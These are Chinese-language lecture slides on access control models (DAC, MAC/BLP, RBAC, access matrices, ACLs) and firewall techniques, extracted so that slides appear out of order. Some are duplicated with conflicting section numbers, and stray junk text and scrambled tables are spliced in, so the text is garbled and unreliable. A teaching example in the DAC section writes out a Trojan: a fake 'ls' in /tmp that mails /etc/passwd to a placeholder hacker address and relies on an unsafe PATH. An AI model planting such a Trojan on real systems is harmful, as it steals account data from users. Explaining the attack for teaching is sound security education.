访问控制原理与防火墙技术

30
关于防火墙的争论
• 防火墙破坏了Internet端到端的特性，阻碍 了新的应用的发展 • 防火墙没有解决主要的安全问题，即网络 内部的安全问题 • 防火墙给人一种误解，降低了人们对主机 安全的意识
31
主要内容
• • • • 5.2.1 防火墙的 基本概念 5.2.2 防火墙的几种技术 5.2.3 防火墙的配置结构 5.2.4 防火墙的设计
第六讲、访问控制原理与防火墙技术
1
6.1 访问控制原理
2
主要内容
• 6.1.1 访问控制的基本概念 • 6.1.2 基本的访问控制政策模型
3
访问控制的基本概念
• 什么是访问控制 • 访问控制的基本模型 • 访问控制和其他安全机制的关系
4
访问控制的基本概念
• 主体(Subject)
– 主体是一个主动的实体，它提出对资源访问请求。 如用户，程序，进程等。
• 客体(Object )
– 含有被访问资源的被动实体，如网络、计算机、 数据库、文件、目录、计算机程序、 外设、网络。
• 访问（Access）
– 对资源的使用，读、写、修改、删除等操作， 例如访问存储器；访问文件、目录、外设；访 问数据库；访问一个网站。
5
访问控制的基本概念
• 访问可以被描述为一个三元组 (s, a, o)
• 只有在主体和客体的安全级别满足一定规 则时，才允许访问
21
强制型访问控制（续）
• BLP 模型
– 禁止向下写：
如果用户的级别比要写 的客体级别高，则该 操作是不允许的
– 禁止向上读：
• 如果主体的级别比要 读的客体级别低，则 该操作是不允许的。
22
强制型访问控制（续）
BLP 模型的信息流
Objects
– 用户Profile，由于客体相当多，分类复杂，不便于授权管理 – 授权证书，属性证书
• 从能力表得到一个主体所有的访问权限，很容易 • 从能力表浏览一个客体所允许的访问控制权限，很困难
11
访问控制表（Access Control List）
Oj
S1
R W
S2
R
S5
R W E
• 访问控制表与客体关联，规定能够访问它的主体和权限 • 由于主体数量一般比客体少得多而且容易分组，授权管 理相对简单 • 得到一个客体所有的访问权限，很容易 • 浏览一个主体的所有访问权限，很困难
19
自主型访问控制(DAC)
• 无法控制信息流动
– 信息在移动过程中其访问权限关系会被改变。如用户 A可将其对目标O的访问权限传递给用户B, 从而使不 具备对O访问权限的B可访问O。
• 特洛伊木马的威胁
– 特洛伊木马（Trojan）是一段计算机程序，它附在合 法程序的中，执行一些非法操作而不被用户发现
• 优点
– – – – 可以保护所有的服务 对应用透明 较高的网络性能 成本较低
• 缺点
– 无法实施细粒度的访 问控制政策 – 现有的工具不完善 – 规则配置复杂 – 降低路由器的性能
35
电路层网关（Circuit Gateway）
• 工作在传输层/会话层
– 根据数据包的标志位建立一个连接状态表 – 对于收到的某个IP包，检查它是否属于某一个会话？ – 跟踪一段时间内一个会话中经过包的总数
32
防火墙技术
• • • • 包过滤技术(Packet filtering/screening) 电路层网关(Socks) 应用层代理(Proxy) 地址转换（NAT）
应用层代理 电路层网关 内部网络 包过滤、地址转换 链路层 物理层
33
外部网络
包过滤技术(Packet filtering)
• 工作在网络层，称为Packet filter, screen router • 基于以下信息对经过的每一个包进行检查：
2A
a00 a M 10 ... am 0
a01 a11 ... am1
... a0 n ... a1n ... ... ... amn
的操作。比如 a { R , W }, a ij lk
对于任意 s S , o O , 存在 a M 决定 s 对 o 允许 i j ij i j
28
防火墙可以做什么
• 防火墙可以在网络边界实施访问控制政策 • 防火墙可以记录所有的访问 • 防火墙可以隐藏内部网络
29
防火墙不可以做什么
• 防火墙自身不会正确的配置，需要用户定 义访问控制规则 • 防火墙不能防止内部恶意的攻击者 • 防火墙无法控制没有经过它的连接 • 防火墙无法防范全新的威胁和攻击 • 防火墙不能很好的实现防病毒
Oct 18 15:16 4011.tmp Oct 28 11:41 ls Aug 29 09:04 mysql.sock Oct 23 23:41 ssl
Oct 18 15:16 4011.tmp Oct 28 11:41 ls Aug 29 09:04 mysql.sock Oct 23 23:41 ssl
Test Engineer
Programmer
• RBAC的优势
– 便于授权管理 – 便于责任划分
Project Member
• 参考文献：
– Ravi S. Sandhu Role-Base Access Control Model, Computer, Feb. 1996 – http://csrc.nist.gov/rbac/
• 完整性
– 限制用户对数据的修改，实现数据完整性保护
• 可用性
– 限制用户对资源的使用量，保证系统的可用性
• 安全管理相关的活动
– 访问控制功能通常和审计、入侵检测联系在一起
15
主要内容
• 访问控制的基本概念 • 基本的访问控制政策模型
16
访问控制政策模型
• 自主型访问控制（DAC） • 强制型访问控制(MAC) • 基于角色的访问控制（RBAC）
访问控制决策功能 （ADF）
访问控制政策规则
上下文信息(如时间，地址等)
7
访问控制的基本概念
• 访问控制信息（ACI）的表示
– 主体访问控制属性 – 客体访问控制属性 – 访问控制政策规则
• 授权（Authorization）
– 怎样把访问控制属性信息分配给主体或客体 – 如何浏览、修改、回收访问控制权限
25
6.2 防火墙技术
26
主要内容
• • • • 6.2.1 防火墙的 基本概念 6.2.2 防火墙的几种技术 6.2.3 防火墙的配置结构 6.2.4 防火墙的设计
27
防火墙的基本概念
• 防火墙是在两个网络(通常是用户内部网络和 Internet)之间实施访问控制政策的一个或一组系 统（硬件、软件的组合） • 所有进入和离开的数据都必须经过防火墙的检查， 只有符合访问控制政策的数据才允许通过
特洛伊木马举例： #cat > /tmp/ls mail hacker@some.where.com < /etc/passwd /bin/ls Ctrl+D # chmod a+x /tmp/ls 如果用户的路径设置不安全，如path= ./:/usr/bin:/usr/sbin:/usr/local/bin # cd /tmp # ls
/bin/ls [root@acl tmp]# chown root ls [root@acl tmp]# ls -l -rw-r--r-1 nobody nobody 770 -rw------1 root users 48 srwxrwxrwx 1 root root 0 drwxrwxr-x 2 duan uan 4096 [root@acl tmp]# chmod o+rw ls [root@acl tmp]# ls -l -rw-r--r-1 nobody nobody 770 -rw----rw1 root users 48 srwxrwxrwx 1 root root 0 drwxrwxr-x 2 duan duan 4096 [root@acl tmp]#
• 矩阵的的i行Si表示了主体si对所有客体的操作权 限，称为主体si的能力表(Capability List) • 矩阵的第j列Oj表示客体oj允许所有主体的操作， 称为oj的访问控制表（ACL）
10
能力表（Capability List）
Si O1 R O2 R O5 R
W
W
E
• 能力表与主体关联，规定主体所能访问的客体和权限。 • 表示形式：
• 常见设备/软件
– 商业防火墙硬件/软件 – 免费软件：Socksd:
• 相关标准 • rfc1928.txt
36
电路层网关（Circuit Gateway）
• 优点
– 支持所有TCP应用 – 保持状态，可以检测、 防范SYN Flood类型的 攻击 – 隐藏内部网络
• 缺点
– 不支持UDP的应用 – 对应用不透明，应用软件 必须经过socksified才能使 用防火墙 – 保持状态，可能造成网络 中断 – 性能的开销较大 – 防火墙本身易受DOS攻击
9
访问控制矩阵
a 00 a M 10 ... a m 0 a 01 a 11 ... a m 1 ... a S 0 n 1 ... a S 1 n 2 O 1 O 2 ... O n ... ... ... ... a S mn m
20
强制型访问控制（MAC）
• Mandatory Access Control • 每个主体和客体分配一个固定的安全级别， 只有系统管理员才可以修改
– Clearance ，classification , sensitivity – Unclassified< confidential< secret< top secret – 普密<秘密<机密<绝密
– 角色是完成一项任务必须访问的资源及相应操作权限 的集合，R={(a1,o1), (a2,o2), (a3,o3)…} – 授权管理：
• 根据任务需要定义角色， • 为角色分配资源和操作权限 • 给一个用户指定一个角色
24
基于角色的访问控制（RBAC）
• 角色的继承关系
Project Supervisor
– – – – – IP 源地址和目标地址 协议 (TCP, UDP,ICMP, BGP等) TCP/UDP源端口号和目标端口号 ICMP的消息类型 包的大小
• 常见包过滤设备/软件
– 路由器访问控制表ACL – 硬件包过滤设备 – 软件：ipchains / netfilter
34
包过滤技术(Packet filtering)
17
自主型访问控制政策
• Discretionary Access Control , DAC • 每个客体有一个属主，属主可以按照自己的 意愿把客体的访问控制权限授予其他主体 • DAC是一种分布式授权管理的模式 • 控制灵活，易于管理，是目前应用最为普遍 的访问控制政策
18
自主型访问控制政策
12
访问控制表（Windows）
13
访问控制与其他安全机制的关系
• 认证、授权、审计（AAA）
授权（auHale Waihona Puke Baiduhorization）
授权信息
身份认证 主体
访问控制 客体
审计
Log
14
访问控制与其他安全机制的关系
• 身分认证
– 身份认证是访问控制的前提
• 保密性
– 限制用户对数据的访问（读取操作）可以实现数据保 密服务
• 访问控制功能的实施
– 控制实施部件如何获得实体的访问控制信息 – 怎样执行
8
访问控制矩阵
• 访问控制机制可以用一个三元组来表示（S,O,M）
– 主体的集合 S={s1,s2,…,sm} – 客体的集合 O={o1,o2,…,on} – 所有操作的集合 A={R, W, E,…} – 访问控制矩阵 M= S × O
R/W
R R R
W
R/W R R S
W
W R/W R C 信息流向
W
W W R/W U
TS
S C U
Subjects
TS
23
基于角色的访问控制(RBAC)
• 用户组（group）
– 用户组：用户的集合 G={s1, s2, s3 …} – 授权管理：把用户分组，把访问权限分配给一个用户 组；
• 角色（Role）
– 主体，发起者 : Subject，Initiator – 客体，目标 : Object, Target – 访问操作 : Access
Read/Write/Exec
Object
6
访问控制模型
访问请求
访问控制执行功能 提交访问 （AEF）
决策请求 决策
客体的访问 控制信息
客体
主体
主体的访问 控制信息